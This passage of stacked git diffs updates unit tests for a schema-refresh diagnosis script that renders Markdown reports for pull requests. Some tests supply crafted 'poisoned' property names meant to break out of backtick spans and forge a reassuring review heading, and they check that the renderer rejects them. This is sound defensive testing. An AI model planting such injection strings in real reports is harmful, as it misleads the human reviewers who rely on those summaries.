+      writableAdded: [],
+      divergences: [],
+      unreadable: files,
+      skipped: [],
+    });
+    expect(md).not.toContain('rejected');
+    for (const file of files) {
+      expect(md).toContain(file.replace(/\.json$/, '').replace(/-/g, '::'));
+    }
   });
 
   it('says nothing about unreadable fixtures when there are none', () => {
@@ -1334,13 +1425,14 @@ describe('the script end to end', () => {
   // against the real repo. Neither log carries a non-case divergence, so no
   // `npm view` runs and the cases stay offline.
   const SCRIPT = join(REPO_ROOT, 'scripts/diagnose-schema-refresh.mjs');
-  const run = (log: string, rc?: string): string => {
+  const run = (log: string, rc?: string, extra: string[] = []): string => {
     const dir = mkdtempSync(join(tmpdir(), 'cdkd-diagnose-'));
     try {
       const path = join(dir, 'nested-key.log');
       writeFileSync(path, log);
       const args = [SCRIPT, '--nested-key-log', path];
       if (rc !== undefined) args.push('--nested-key-rc', rc);
+      args.push(...extra);
       return execFileSync('node', args, { encoding: 'utf8' });
     } finally {
       rmSync(dir, { recursive: true, force: true });
@@ -1376,6 +1468,31 @@ describe('the script end to end', () => {
     // refusing every manual invocation is not a safety property. The workflow
     // dropping the flag is guarded in the workflow test instead.
     expect(run('')).toContain('Nothing in this refresh needs a decision');
+  }, 60_000);
+
+  it('carries --failed-checks from the command line into the body', () => {
+    // The workflow test pins the shell that PASSES the list and the renderer
+    // tests hand-feed it; nothing joined them, so `main()` could discard the
+    // list and render "additions only" over a red check — the exact defect
+    // eight rounds went into finding. The sibling `--nested-key-rc` had this
+    // case; the twin was never written.
+    const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
+      '--failed-checks',
+      'property-coverage,audit:sdk-attr-coverage:check',
+    ]);
+    expect(md).not.toContain('Nothing in this refresh needs a decision');
+    expect(md).toContain('property-coverage');
+    expect(md).toContain('audit:sdk-attr-coverage:check');
+  }, 60_000);
+
+  it('treats an EMPTY --failed-checks as nothing failed', () => {
+    // The list is empty on every green cycle, so this is the ordinary path and
+    // it must not render a decision section.
+    const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
+      '--failed-checks',
+      '',
+    ]);
+    expect(md).toContain('Nothing in this refresh needs a decision');
   }, 60_000);
 
   it('renders a case-divergence without asking npm anything', () => {
@@ -1427,6 +1544,29 @@ describe('collectFixtureDeltas', () => {
     expect(out.writableAdded).toEqual([]);
   });
 
+  it('COUNTS a fixture whose committed side could not be READ', () => {
+    // `git show` failing (git absent, a broken repo, the 32 MB buffer) used to
+    // be `undefined` — the same value as "not in HEAD" — so every fixture
+    // looked brand-new and the whole refresh looked clean, over a step that
+    // only runs when drift exists.
+    let readCurrent = 0;
+    const out = collectFixtureDeltas({
+      ...base,
+      files: ['AWS-Glue-Connection.json'],
+      committedOf: () => UNREADABLE,
+      currentOf: () => {
+        readCurrent += 1;
+        return fixture(['A']);
+      },
+    });
+    expect(out.unreadable).toEqual(['AWS-Glue-Connection.json']);
+    // Discriminating: without the explicit branch the sentinel falls through to
+    // `comparePropertySets`, which throws and lands in the SAME list — the same
+    // answer by accident. Reaching the current side at all is the difference,
+    // and it is the wasteful, fragile path.
+    expect(readCurrent, 'the sentinel fell through to the comparison').toBe(0);
+  });
+
   it('skips a BRAND-NEW fixture silently, which is not the same thing', () => {
     // No committed side means nothing to compare, not something unreadable —
     // counting it would put every newly captured type in the warning list.
@@ -1438,6 +1578,43 @@ describe('collectFixtureDeltas', () => {
     });
     expect(out.unreadable).toEqual([]);
     expect(out.writableAdded).toEqual([]);
+  });
+
+  it('looks the provider up by RESOURCE TYPE, and stores what it found', () => {
+    // The four original cases asserted only the counts, and `base` stubs both
+    // collaborators to ignore their arguments — so keying the provider lookup
+    // on the FILENAME instead of the type, dropping the SDK evidence, and
+    // dropping the rename pairing were each invisible. The SDK evidence is
+    // fact #2 of this script's whole purpose.
+    const seen: Array<[string, string | undefined, string | undefined]> = [];
+    const out = collectFixtureDeltas({
+      ...base,
+      files: ['AWS-Glue-Connection.json'],
+      committedOf: () => fixture(['OldProp']),
+      currentOf: () => fixture(['OldPropV2'], []),
+      declarationCandidates: (property, providerRelPath, resourceType) => {
+        seen.push([property, providerRelPath, resourceType]);
+        return ['src/provisioning/providers/glue-provider.ts:42'];
+      },
+      sdkEvidence: (property, providerRelPath) => ({
+        client: `client-for:${providerRelPath}`,
+        modelled: true,
+      }),
+    });
+    // Looked up by TYPE — the filename would resolve to nothing in the map.
+    expect(seen).toEqual([
+      ['OldProp', 'src/provisioning/providers/glue-provider.ts', 'AWS::Glue::Connection'],
+    ]);
+    const entry = out.removed[0]!;
+    expect(entry.providerPath).toBe('src/provisioning/providers/glue-provider.ts');
+    expect(entry.candidates['OldProp']).toEqual([
+      'src/provisioning/providers/glue-provider.ts:42',
+    ]);
+    expect(entry.sdk!['OldProp']!.client).toBe(
+      'client-for:src/provisioning/providers/glue-provider.ts'
+    );
+    // And the rename pairing runs against THIS delta's writable additions.
+    expect(entry.renameCandidates!['OldProp']).toEqual(['OldPropV2']);
   });
 
   it('reports a removal only when the provider DECLARES the property', () => {

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -2213,10 +2213,28 @@ describe('the generated-module renderers', () => {
     expect(drops).not.toContain("['zzz',");
     expect(drops).toContain(JSON.stringify(hostile));
 
-    // And the emitted text still PARSES as the expression it claims to be —
-    // escaping that produced invalid TypeScript would fail the build instead.
+    // A weaker check than it looks, stated as such: `new Function` parses
+    // `new Set<string>([...])` as relational operators, not as the TypeScript
+    // it is — so this does NOT prove the emission is valid TS. It does throw on
+    // the hostile emission, which is the discrimination being bought here; the
+    // TS validity of the whole module is covered by the build.
     expect(() => new Function(`return ${handled}`)).not.toThrow();
     expect(() => new Function(`return ${drops}`)).not.toThrow();
+  });
+
+  it('escapes the TYPE key too, not only the two renderers', async () => {
+    // The third site this PR escaped, and the one the cases missed: the
+    // rationale comment says "in BOTH renderers", which excludes the entry key
+    // by wording. Its input is provider-source-derived rather than
+    // bundle-derived, so this is a test gap and not an exposure — but a raw
+    // interpolation left beside two hardened ones is the ambiguity the comment
+    // exists to remove.
+    const mod = await import('../../../scripts/gen-property-coverage.ts');
+    const src = readFileSync(join(REPO_ROOT, 'scripts/gen-property-coverage.ts'), 'utf8');
+    expect(mod).toBeDefined();
+    // The emitted entry key must go through JSON.stringify like its siblings.
+    expect(src, 'the entry key is interpolated raw').not.toMatch(/^\s*'\$\{type\}',$/m);
+    expect(src).toMatch(/\$\{JSON\.stringify\(type\)\},/);
   });
 
   it('emits DOUBLE quotes, which the formatter normalises back', async () => {

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -1690,10 +1690,10 @@ describe('the script end to end', () => {
   }, 60_000);
 
   it('refuses a flag given more than once, in every spelling', () => {
-    // `rawArg` takes the FIRST match, so the later value is silently discarded
-    // — `--nested-key-rc 0 --nested-key-rc 3` rendered the clean verdict over
-    // an rc=3 checker. It was the last argv shape that still reached a
-    // confident answer.
+    // `rawArg` reads exactly ONE of them, and which one depends on the
+    // spelling: it looks for the glued form first, so the third case below
+    // reads 3 while the other two read 0. Either way a value is silently
+    // discarded — the last argv shape that still reached a confident answer.
     for (const argv of [
       ['--nested-key-rc', '0', '--nested-key-rc', '3'],
       ['--nested-key-rc=0', '--nested-key-rc=3'],

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -641,6 +641,7 @@ describe('renderDiagnosis', () => {
           installed: '3.9.0',
           latest: '3.9.0',
           behind: false,
+          matched: true,
         },
       ],
     });
@@ -666,6 +667,7 @@ describe('renderDiagnosis', () => {
           installed: '3.1018.0',
           latest: '3.1127.0',
           behind: true,
+          matched: true,
         },
       ],
     });
@@ -799,6 +801,19 @@ describe('the render guards, at every site that reaches Markdown', () => {
           installed: '3.0.0',
           latest: '3.1.0',
           behind: true,
+          matched: true,
+        },
+        {
+          // The RULED-OUT arm, which is the ordinary case — an installed client
+          // that is current. It renders its own `resourceType`, and with only
+          // the `behind: true` row here that interpolation could be reverted to
+          // raw with nothing noticing. Two arms, two poisoned rows.
+          resourceType: POISON_TYPE,
+          client: '@aws-sdk/client-ec2',
+          installed: '3.0.0',
+          latest: '3.0.0',
+          behind: false,
+          matched: true,
         },
       ],
     });
@@ -813,7 +828,7 @@ describe('the render guards, at every site that reaches Markdown', () => {
     // writable-added type and its property list, the lag row's type, and the
     // skipped list.
     const rejections = (md.match(/\[(?:name|key) rejected: unexpected characters\]/g) ?? []).length;
-    expect(rejections, 'a call site is interpolating a bundle-derived name raw').toBe(9);
+    expect(rejections, 'a call site is interpolating a bundle-derived name raw').toBe(10);
     // And the forged heading never renders as one.
     expect(md).not.toMatch(/^## Nothing in this refresh needs a decision$/m);
   });
@@ -873,7 +888,7 @@ describe('the unparsed-failure verdict', () => {
       skipped: [],
     });
     expect(md).not.toContain('additions only');
-    expect(md).toContain('FAILED in a mode this report cannot read');
+    expect(md).toContain('could not read');
     expect(md).toContain('audit:nested-key-coverage:check');
     // The rest of the report is still rendered — that is the whole point of not
     // throwing.
@@ -945,6 +960,7 @@ describe('the SDK-lag section', () => {
           installed: '3.9.0',
           latest: '3.9.0',
           behind: false,
+          matched: true,
         },
       ],
     });
@@ -1077,6 +1093,27 @@ describe('clientsForType', () => {
     expect(clientsForType('', rows)).toEqual(hedged);
   });
 
+  it('matches the service name EXACTLY, not by prefix', () => {
+    // `startsWith` is equivalent on today's tree — every widening it causes is
+    // a single-client provider the next arm settles anyway — so nothing caught
+    // it. It bites where a client suffix is a proper superstring of the service
+    // segment, and then the renderer says "here" about the wrong client.
+    const rows = [
+      { client: '@aws-sdk/client-s3-control', version: '3.1.0' },
+      { client: '@aws-sdk/client-sts', version: '3.0.0' },
+    ];
+    expect(clientsForType('AWS::S3::Bucket', rows).every((r) => !r.matched)).toBe(true);
+  });
+
+  it('does not settle a single client against a type name that did not parse', () => {
+    // The arm reasons "one client, nothing to disambiguate" — which is only
+    // true once there IS a service to disambiguate against.
+    const one = [{ client: '@aws-sdk/client-eventbridge', version: '3.1.0' }];
+    expect(clientsForType('', one)).toEqual([
+      { client: '@aws-sdk/client-eventbridge', version: '3.1.0', matched: false },
+    ]);
+  });
+
   it('settles a SINGLE-client provider even when the name test cannot', () => {
     // The name test is a heuristic, and reading its failure as "wrong client"
     // was a regression: 13 of the 134 registered types are served by a client
@@ -1114,8 +1151,15 @@ describe('clientsForType', () => {
       if (clientsForType(type, rows)[0]!.matched) settled++;
       else hedged++;
     }
-    expect(settled, 'the client match stopped resolving').toBeGreaterThan(100);
+    // BOTH bounds are on `hedged`, and that is the correction: every type with
+    // a client increments exactly one counter, so `settled + hedged` is a
+    // constant and `settled > 100` could never be the failing assertion —
+    // `hedged <= 6` already implies it. The floor the old comment promised was
+    // asserted by neither line, and `matched: true` unconditionally gave
+    // {settled: 132, hedged: 0} while passing both.
+    expect(settled + hedged, 'no type reached a client at all').toBeGreaterThan(100);
     expect(hedged, 'more types went ambiguous than the measurement found').toBeLessThanOrEqual(6);
+    expect(hedged, 'nothing hedges any more — the flag stopped discriminating').toBeGreaterThan(0);
   });
 });
 
@@ -1231,7 +1275,7 @@ describe('the script end to end', () => {
     const md = run(
       'nested-key-coverage: FAIL — stale NESTED_KEY_ALLOW_LIST entr(ies) match no audited key\n'
     );
-    expect(md).toContain('FAILED in a mode this report cannot read');
+    expect(md).toContain('could not read');
     expect(md).not.toContain('Nothing in this refresh needs a decision — additions only');
   }, 60_000);
 
@@ -1239,7 +1283,11 @@ describe('the script end to end', () => {
     // Both arms of the flag reader used to return 0 — "the checker succeeded" —
     // so a mistyped value silently restored the behaviour where a checker that
     // never ran renders as "additions only".
-    expect(run('', 'not-a-number')).toContain('FAILED in a mode this report cannot read');
+    for (const unreadable of ['not-a-number', '', ' ']) {
+      expect(run('', unreadable), `read as success: ${JSON.stringify(unreadable)}`).toContain(
+        'could not read'
+      );
+    }
     // The ABSENT flag stays 0 on purpose: this script is also run by hand, and
     // refusing every manual invocation is not a safety property. The workflow
     // dropping the flag is guarded in the workflow test instead.

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -1544,6 +1544,32 @@ describe('the script end to end', () => {
     expect(md).toContain('--failed-checks was given with no value');
   }, 60_000);
 
+  it('refuses a log path that does not exist', () => {
+    // The third arg reader was the last one still silent on both counts. A
+    // missing `--skipped-log` returned `''`, the section is omitted when empty,
+    // and an unread log is then byte-identical to "everything was refreshed" —
+    // with no companion status flag to rescue it, unlike `--nested-key-log`.
+    const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
+      '--skipped-log',
+      '/no/such/path.log',
+    ]);
+    expect(md).toContain('which does not exist');
+    expect(md).not.toContain('Nothing in this refresh needs a decision');
+  }, 60_000);
+
+  it('refuses a flag consumed as another flag’s value', () => {
+    // `undefined` is only the TRAILING spelling of "no value". A following FLAG
+    // is the same mistake and was read as the value: this fabricated a failed
+    // check literally named `--skipped-log`, rendered with "no guidance".
+    const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
+      '--failed-checks',
+      '--skipped-log',
+      '/dev/null',
+    ]);
+    expect(md).toContain('--failed-checks was given with no value');
+    expect(md).not.toContain('no guidance');
+  }, 60_000);
+
   it('renders a case-divergence without asking npm anything', () => {
     const md = run(
       'nested-key-coverage: FAIL — nested CFn->SDK key divergence(s) detected.\n' +

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -1595,6 +1595,33 @@ describe('the script end to end', () => {
     expect(md).not.toContain('-property-coverage');
   }, 60_000);
 
+  it('refuses a dash-leading value in the GLUED spelling too', () => {
+    // The glued branch returned before the dash test, so
+    // `--failed-checks=-property-coverage` fabricated exactly the check the
+    // space-form guard was written to kill. Both spellings were added to the
+    // same function in the same round and never crossed; the case that came
+    // with them covered glued-clean and space-dash, never glued-dash.
+    for (const spelling of ['--failed-checks=-property-coverage', '--failed-checks=--skipped-log']) {
+      const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, [spelling]);
+      expect(md, `accepted ${spelling}`).toContain('was given with no value');
+      expect(md).not.toContain('no guidance');
+    }
+  }, 60_000);
+
+  it('does not answer a check name inherited from Object.prototype', () => {
+    // A plain object literal answers for `constructor` / `toString` /
+    // `valueOf` with a FUNCTION, which the spread cannot iterate — collapsing
+    // the whole diagnosis to the generic failure line instead of rendering an
+    // unknown check.
+    const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, [
+      '--failed-checks',
+      'constructor',
+    ]);
+    expect(md).toContain('constructor');
+    expect(md).toContain('no guidance');
+    expect(md).not.toContain('failed to run');
+  }, 60_000);
+
   it('refuses a log path that is a DIRECTORY, naming the cause', () => {
     // It passes `existsSync` and throws `EISDIR` inside `readFileSync`, which
     // collapsed the whole report to the generic one-line failure. Every other

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -32,8 +32,10 @@ import {
   findDeclarationCandidates,
   mapTypesToProviderFiles,
   parseDeclaredProperties,
+  pairRenames,
   parseNestedKeyDivergences,
   renderDiagnosis,
+  renderName,
   sdkModelsMember,
   sdkVersionLag,
 } from '../../../scripts/diagnose-schema-refresh.mjs';
@@ -97,6 +99,20 @@ describe('parseNestedKeyDivergences', () => {
       parseNestedKeyDivergences('nested-key-coverage: FAIL — nested CFn->SDK key divergence\n')
     ).toThrow(/output format changed/);
   });
+
+  it('does NOT refuse the checker’s OTHER failure modes, which print no findings', () => {
+    // Three of the checker's four FAIL modes legitimately emit no finding line.
+    // Refusing on those made main() discard the entire diagnosis — losing the
+    // removal and addition sections too — and blame a format change that had
+    // not happened.
+    for (const other of [
+      'nested-key-coverage: FAIL — stale NESTED_KEY_ALLOW_LIST entr(ies) match no audited key',
+      'nested-key-coverage: FAIL — stale segmentRenames entr(ies) no longer resolve anything',
+      'nested-key-coverage: FAIL — stale terminalRenames entr(ies): the un-renamed terminal',
+    ]) {
+      expect(parseNestedKeyDivergences(other)).toEqual([]);
+    }
+  });
 });
 
 describe('parseDeclaredProperties', () => {
@@ -107,7 +123,17 @@ describe('parseDeclaredProperties', () => {
     // whatever the parser expects, which is exactly how the `<string>` type
     // argument was missed.
     const declared = parseDeclaredProperties(readFileSync(REAL_GENERATED, 'utf8'));
-    expect(declared.size).toBeGreaterThan(100);
+    // Compared against the module's OWN entry count, not a floor. A floor of
+    // 100 was blind to the real defect: 131 of 134 parsed, three types silently
+    // absent and two credited with a NEIGHBOUR's properties, because a type
+    // whose set is `new Set<string>()` has no `[` for the lazy match to stop at.
+    const entryCount = (readFileSync(REAL_GENERATED, 'utf8').match(/\[\s*'AWS::[\w:]+',\s*\{/g) ?? [])
+      .length;
+    expect(entryCount).toBeGreaterThan(100);
+    expect(declared.size).toBe(entryCount);
+    // The two types the partial parse mis-credited, pinned by name.
+    expect(declared.get('AWS::CloudFormation::WaitConditionHandle')!.size).toBe(0);
+    expect(declared.get('AWS::BedrockAgentCore::Evaluator')!.has('EvaluatorConfig')).toBe(true);
     const route53 = declared.get('AWS::Route53::RecordSet');
     expect(route53, 'AWS::Route53::RecordSet left the generated table').toBeDefined();
     expect(route53!.has('AliasTarget')).toBe(true);
@@ -152,8 +178,12 @@ describe('findDeclarationCandidates', () => {
   it('is scoped to the provider serving the type, not the whole directory', () => {
     // The confident-wrong-answer case. Unscoped, `Id` matched 50+ lines across
     // 20 providers; scoped, it can only report the file that owns the type.
+    // `AliasTarget`, not `GeoProximityLocation`: the latter is the property this
+    // very refresh cycle removes, so following the runbook's own remedy would
+    // red this test with a message about the diagnosis script rather than about
+    // the classification.
     const hits = findDeclarationCandidates(
-      'GeoProximityLocation',
+      'AliasTarget',
       'src/provisioning/providers/route53-provider.ts',
       'AWS::Route53::RecordSet',
       REPO_ROOT
@@ -172,27 +202,35 @@ describe('findDeclarationCandidates', () => {
     // 17 provider files serve more than one type; `ec2-provider.ts` serves 15.
     // Unscoped, asking about `Tags` on one Glue type returned every `'Tags'` in
     // the file, including other Glue types' declarations.
-    const scoped = findDeclarationCandidates(
-      'Tags',
-      'src/provisioning/providers/glue-provider.ts',
-      'AWS::Glue::Connection',
-      REPO_ROOT
+    // A NON-EMPTY scoped answer, and the sibling type's line explicitly
+    // excluded. The earlier form compared lengths, and the scoped answer was
+    // `[]` — so `0 < 18` passed trivially and deleting the block's END bound
+    // left it green.
+    const type = 'AWS::Glue::Connection';
+    const file = 'src/provisioning/providers/glue-provider.ts';
+    const scoped = findDeclarationCandidates('ConnectionInput', file, type, REPO_ROOT);
+    const unscoped = findDeclarationCandidates('ConnectionInput', file, undefined, REPO_ROOT);
+    expect(scoped.length, 'the type block yielded nothing — scoping window is wrong').toBeGreaterThan(0);
+    expect(unscoped.length).toBeGreaterThanOrEqual(scoped.length);
+    // Every scoped hit must sit inside the block, i.e. at or after the type's
+    // own literal — deleting the window's END makes this fail on a later type.
+    const lines = readFileSync(join(REPO_ROOT, file), 'utf8').split('\n');
+    const start = lines.findIndex((l) => l.includes(`'${type}'`));
+    const nextType = lines.findIndex(
+      (l, i) => i > start && /'AWS::[A-Za-z0-9]+::[A-Za-z0-9]+'/.test(l)
     );
-    const unscoped = findDeclarationCandidates(
-      'Tags',
-      'src/provisioning/providers/glue-provider.ts',
-      undefined,
-      REPO_ROOT
-    );
-    expect(unscoped.length).toBeGreaterThan(5);
-    expect(scoped.length).toBeLessThan(unscoped.length);
+    for (const hit of scoped) {
+      const lineNo = Number(hit.split(':')[1]);
+      expect(lineNo).toBeGreaterThan(start);
+      if (nextType !== -1) expect(lineNo).toBeLessThanOrEqual(nextType);
+    }
   });
 });
 
 describe('sdkModelsMember', () => {
   it('consults the client the OWNING provider imports', () => {
     const evidence = sdkModelsMember(
-      'GeoProximityLocation',
+      'AliasTarget',
       'src/provisioning/providers/route53-provider.ts',
       REPO_ROOT
     );
@@ -280,6 +318,46 @@ describe('sdkVersionLag', () => {
   });
 });
 
+describe('pairRenames', () => {
+  /**
+   * The PAIRING is tested, not the renderer's reaction to a hand-fed result.
+   * The earlier case passed `renameCandidates: []` into `renderDiagnosis` and
+   * asserted no rename appeared — trivially true, and it left the actual rule
+   * unpinned: reverting it to "every writable addition is a rename" kept all 37
+   * cases green.
+   */
+  it('pairs a removal with a similarly-named addition', () => {
+    expect(pairRenames('Id', ['RepositoryId'])).toEqual(['RepositoryId']);
+    expect(pairRenames('GeoProximityLocation', ['GeoProximityLocationV2'])).toEqual([
+      'GeoProximityLocationV2',
+    ]);
+  });
+
+  it('does NOT pair an unrelated addition', () => {
+    // The surviving mutation the old test could not see: unconditional pairing
+    // told the maintainer that `Tags` and `Name` were `Id` renamed.
+    expect(pairRenames('Id', ['Tags', 'Name', 'CapacityProviderConfiguration'])).toEqual([]);
+  });
+
+  it('pairs nothing when the refresh added nothing writable', () => {
+    // Read-only additions never reach here — a declaration cannot target one.
+    expect(pairRenames('Id', [])).toEqual([]);
+  });
+});
+
+describe('renderName', () => {
+  it('rejects a name carrying Markdown rather than rendering it', () => {
+    // Property names come from an artifact this job documents as
+    // TLS-trusted-only. A crafted key can close the backtick span and forge a
+    // "nothing needs a decision" heading in the PR body and the umbrella issue
+    // comment — attacking the human-review half of that accepted residual.
+    expect(renderName('WarmUpConfiguration')).toBe('`WarmUpConfiguration`');
+    const poisoned = renderName('Foo`\n\n## Nothing in this refresh needs a decision');
+    expect(poisoned).not.toContain('##');
+    expect(poisoned).toContain('rejected');
+  });
+});
+
 describe('renderDiagnosis', () => {
   const removedEntry = {
     resourceType: 'AWS::Route53::RecordSet',
@@ -361,20 +439,6 @@ describe('renderDiagnosis', () => {
     expect(md).toContain('RepositoryId');
   });
 
-  it('does NOT call a READ-ONLY addition a rename', () => {
-    // A declaration cannot target a read-only property, so "point the
-    // declaration at the new name" would just produce the next bogus entry.
-    // The pairing is fed from writable additions only.
-    const md = renderDiagnosis({
-      removed: [{ ...removedEntry, renameCandidates: { GeoProximityLocation: [] } }],
-      writableAdded: [],
-      readOnlyAddedCount: 1,
-      divergences: [],
-      skipped: [],
-    });
-    expect(md).not.toContain('Likely a RENAME');
-  });
-
   it('does NOT claim a rename when the refresh added nothing to that type', () => {
     const md = renderDiagnosis({
       removed: [{ ...removedEntry, renameCandidates: { GeoProximityLocation: [] } }],
@@ -426,7 +490,13 @@ describe('renderDiagnosis', () => {
         { resourceType: 'AWS::Glue::Connection', bucket: 'no-sdk-member', line: 'x [no-sdk-member]' },
       ],
       skipped: [],
-      sdkLag: { client: '@aws-sdk/client-glue', installed: '3.9.0', latest: '3.9.0', behind: false },
+      sdkLag: {
+        client: '@aws-sdk/client-glue',
+        resourceType: 'AWS::Glue::Connection',
+        installed: '3.9.0',
+        latest: '3.9.0',
+        behind: false,
+      },
     });
     expect(md).toContain('is current');
     expect(md).toContain('ruled out');
@@ -443,7 +513,13 @@ describe('renderDiagnosis', () => {
         { resourceType: 'AWS::Glue::Connection', bucket: 'no-sdk-member', line: 'x [no-sdk-member]' },
       ],
       skipped: [],
-      sdkLag: { client: '@aws-sdk/client-glue', installed: '3.1018.0', latest: '3.1127.0', behind: true },
+      sdkLag: {
+        client: '@aws-sdk/client-glue',
+        resourceType: 'AWS::Glue::Connection',
+        installed: '3.1018.0',
+        latest: '3.1127.0',
+        behind: true,
+      },
     });
     expect(md).toContain('3.1018.0');
     expect(md).toContain('3.1127.0');

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -1529,6 +1529,21 @@ describe('the script end to end', () => {
     expect(md).toContain('Nothing in this refresh needs a decision');
   }, 60_000);
 
+  it('refuses a --failed-checks given with NO value', () => {
+    // Present-with-no-value is unreadable, not empty, and empty reads as
+    // "nothing failed" — the same distinction `--nested-key-rc` needed. The
+    // script still exits 0 (a diagnosis must not take down the PR it
+    // describes), so the refusal has to be visible in the body.
+    const md = run('nested-key-coverage: OK — 0 divergences\n', undefined, ['--failed-checks']);
+    expect(md).not.toContain('Nothing in this refresh needs a decision');
+    // The MESSAGE, not just the outcome: without the explicit refusal the
+    // `undefined` reaches `.split(',')` and throws a TypeError, which the outer
+    // handler renders as the same generic failure — so asserting "failed to
+    // run" alone could not tell the deliberate refusal from the accident, and
+    // the maintainer would read `Cannot read properties of undefined`.
+    expect(md).toContain('--failed-checks was given with no value');
+  }, 60_000);
+
   it('renders a case-divergence without asking npm anything', () => {
     const md = run(
       'nested-key-coverage: FAIL — nested CFn->SDK key divergence(s) detected.\n' +
@@ -1649,6 +1664,29 @@ describe('collectFixtureDeltas', () => {
     // "could not read", never "brand-new".
     expect(classifyGitShowFailure('')).toBe(UNREADABLE);
     expect(classifyGitShowFailure('fatal: not a git repository')).toBe(UNREADABLE);
+  });
+
+  it('falls back to the filename as a TYPE name, not as a filename', () => {
+    // A fixture missing `resourceType` yields the stem, which is hyphenated —
+    // and `renderName` rejects hyphens, so the heading became
+    // `**[name rejected]**`. The declared-property lookup misses either way,
+    // but a legible heading says which type it missed for. Same shape as the
+    // two render sites the previous two rounds fixed.
+    const out = collectFixtureDeltas({
+      ...base,
+      files: ['AWS-Glue-Connection.json'],
+      committedOf: () => JSON.stringify({ properties: ['A'] }),
+      currentOf: () => JSON.stringify({ properties: [] }),
+      declared: new Map([['AWS::Glue::Connection', new Set(['A'])]]),
+    });
+    expect(out.removed[0]!.resourceType).toBe('AWS::Glue::Connection');
+    const md = renderDiagnosis({
+      removed: out.removed,
+      writableAdded: [],
+      divergences: [],
+      skipped: [],
+    });
+    expect(md).not.toContain('rejected');
   });
 
   it('skips a BRAND-NEW fixture silently, which is not the same thing', () => {

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -33,7 +33,13 @@ import {
   mapTypesToProviderFiles,
   parseDeclaredProperties,
   pairRenames,
+  NESTED_KEY_FAILURE_RE,
   parseNestedKeyDivergences,
+  renderDetail,
+  renderKey,
+  renderLiteral,
+  clientsForType,
+  sdkClientVersions,
   renderDiagnosis,
   renderName,
   sdkModelsMember,
@@ -70,8 +76,11 @@ describe('comparePropertySets', () => {
 });
 
 describe('parseNestedKeyDivergences', () => {
-  it('picks out the checker’s own finding lines and keeps them verbatim', () => {
-    const out = parseNestedKeyDivergences(
+  it('captures the finding line FIELD BY FIELD, not as one opaque string', () => {
+    // `nestedKey` reaches Markdown, and it comes from the un-checksummable
+    // bundle by way of the fixtures — so it has to arrive as its own field for
+    // the render guard to have anything to guard.
+    const { divergences, unparsedFailure } = parseNestedKeyDivergences(
       [
         'nested-key-coverage: FAILED',
         '  AWS::Glue::Connection: OAuth2Credentials [definition-member-missing] (SDK interface `OAuth2Properties` has no member)',
@@ -79,38 +88,65 @@ describe('parseNestedKeyDivergences', () => {
         'some unrelated trailing line',
       ].join('\n')
     );
-    expect(out).toHaveLength(2);
-    expect(out[0]!.resourceType).toBe('AWS::Glue::Connection');
-    expect(out[0]!.bucket).toBe('definition-member-missing');
-    // Verbatim: the checker's wording is the authority, not a paraphrase.
-    expect(out[0]!.line).toContain('has no member');
-    expect(out[1]!.bucket).toBe('case-divergence');
+    expect(unparsedFailure).toBe(false);
+    expect(divergences).toHaveLength(2);
+    expect(divergences[0]!.resourceType).toBe('AWS::Glue::Connection');
+    expect(divergences[0]!.nestedKey).toBe('OAuth2Credentials');
+    expect(divergences[0]!.bucket).toBe('definition-member-missing');
+    expect(divergences[0]!.detail).toContain('has no member');
+    expect(divergences[1]!.bucket).toBe('case-divergence');
+    expect(divergences[1]!.nestedKey).toBe('someKey');
   });
 
-  it('returns nothing for output with no findings', () => {
-    expect(parseNestedKeyDivergences('nested-key-coverage: OK — 0 divergences')).toEqual([]);
+  it('returns nothing, and no failure flag, for output with no findings', () => {
+    expect(parseNestedKeyDivergences('nested-key-coverage: OK — 0 divergences')).toEqual({
+      divergences: [],
+      unparsedFailure: false,
+    });
   });
 
-  it('REFUSES to report nothing from output that says it FAILED', () => {
-    // The finding-line format lives in another file and nothing fences the two.
-    // A wording change there would silently make this return [] and render
-    // "nothing needs a decision" over a red check.
-    expect(() =>
-      parseNestedKeyDivergences('nested-key-coverage: FAIL — nested CFn->SDK key divergence\n')
-    ).toThrow(/output format changed/);
-  });
-
-  it('does NOT refuse the checker’s OTHER failure modes, which print no findings', () => {
-    // Three of the checker's four FAIL modes legitimately emit no finding line.
-    // Refusing on those made main() discard the entire diagnosis — losing the
-    // removal and addition sections too — and blame a format change that had
-    // not happened.
-    for (const other of [
+  it('FLAGS a failure it could not read, in every mode the checker announces one', () => {
+    // The checker's four FAIL verdicts and its crash path all legitimately
+    // print no finding line this parser recognises. Throwing on them discarded
+    // the whole diagnosis; returning a bare `[]` rendered "additions only" over
+    // a red check. Both were shipped; the flag is the third answer.
+    for (const failing of [
+      'nested-key-coverage: FAIL — nested CFn->SDK key divergence(s) detected.',
       'nested-key-coverage: FAIL — stale NESTED_KEY_ALLOW_LIST entr(ies) match no audited key',
       'nested-key-coverage: FAIL — stale segmentRenames entr(ies) no longer resolve anything',
       'nested-key-coverage: FAIL — stale terminalRenames entr(ies): the un-renamed terminal',
+      'nested-key-coverage: failed — Cannot find module',
     ]) {
-      expect(parseNestedKeyDivergences(other)).toEqual([]);
+      const out = parseNestedKeyDivergences(failing);
+      expect(out.divergences).toEqual([]);
+      expect(out.unparsedFailure, `did not flag: ${failing}`).toBe(true);
+    }
+  });
+
+  it('does not flag a failure when it DID read findings out of one', () => {
+    const out = parseNestedKeyDivergences(
